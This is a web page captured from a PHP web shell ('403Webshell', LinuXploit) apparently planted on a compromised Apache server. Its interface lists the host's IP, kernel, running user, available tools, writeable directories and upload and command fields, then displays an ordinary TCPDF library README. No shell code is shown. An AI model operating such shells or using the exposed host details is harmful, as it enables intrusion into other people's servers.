403Webshell
Server IP : 61.19.30.66  /  Your IP : 216.73.216.59
Web Server : Apache/2.2.22 (Ubuntu)
System : Linux klw 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64
User : www-data ( 33)
PHP Version : 5.3.10-1ubuntu3.48
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/phpmyadming/libraries/tcpdf/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/phpmyadming/libraries/tcpdf/README
TCPDF - README
============================================================

Name:
	TCPDF

Version:
	1.53.0.TC026_PHP4
	
Release date:
	2006-10-28

Author:
	Nicola Asuni 
	
Copyright (c) 2001-2006:
	Tecnick.com S.r.l.
	Via Ugo Foscolo n.19
	09045 Quartu Sant'Elena (CA)
	ITALY
	www.tecnick.com
	
URLs:
	http://tcpdf.sourceforge.net/
	http://tcpdf.sf.net/

Description:
	TCPDF is a PHP4 class for generating PDF files on-the-fly without requiring external extensions.
	TCPDF is an extension and improvement of the FPDF class by Olivier Plathey (http://www.fpdf.org).
	
	Main Features:
	
	 - supports all ISO page formats;
	 - supports UTF-8 Unicode;
	 - includes methods to publish some xhtml code, supporting the following elements: h1, h2, h3, h4, h5, h6, b, u, i, a, img, p, br, strong, em, font, blockquote, li, ul, ol, hr, td, th, tr, table, sup, sub, small;
	 - includes a method to print various barcode formats using an improved version of "Generic Barcode Render Class" by Karim Mribti (http://www.mribti.com/barcode/) (require GD library: http://www.boutell.com/gd/)
	 - supports TrueTypeUnicode, TrueType, Type1 and encoding; 
	 - supports custom page formats, margins and units of measure;
	 - includes methods for page header and footer management;
	 - supports automatic page break;
	 - supports automatic page numbering;
	 - supports automatic line break and text justification;
	 - supports JPEG and PNG images;
	 - supports colors;
	 - supports links;
	 - support page compression (require zlib extension: http://www.gzip.org/zlib/);
	 - the source code is full documented in PhpDocumentor Style (http://www.phpdoc.org).

Installation:
	1. copy the folder on your Web server
	2. set your installation path on the config/tcpdf_config.php
	3. call the test_unicode.php page with your browser to see an example
	NOTE: the test_old.php require proper font setup on tcpdf_config.

Source Code Documentation:
	doc/index.html

License
	GNU LESSER GENERAL PUBLIC LICENSE v.2.1
	http://www.gnu.org/copyleft/lesser.html
============================================================

Youez - 2016 - github.com/yon3zu
LinuXploit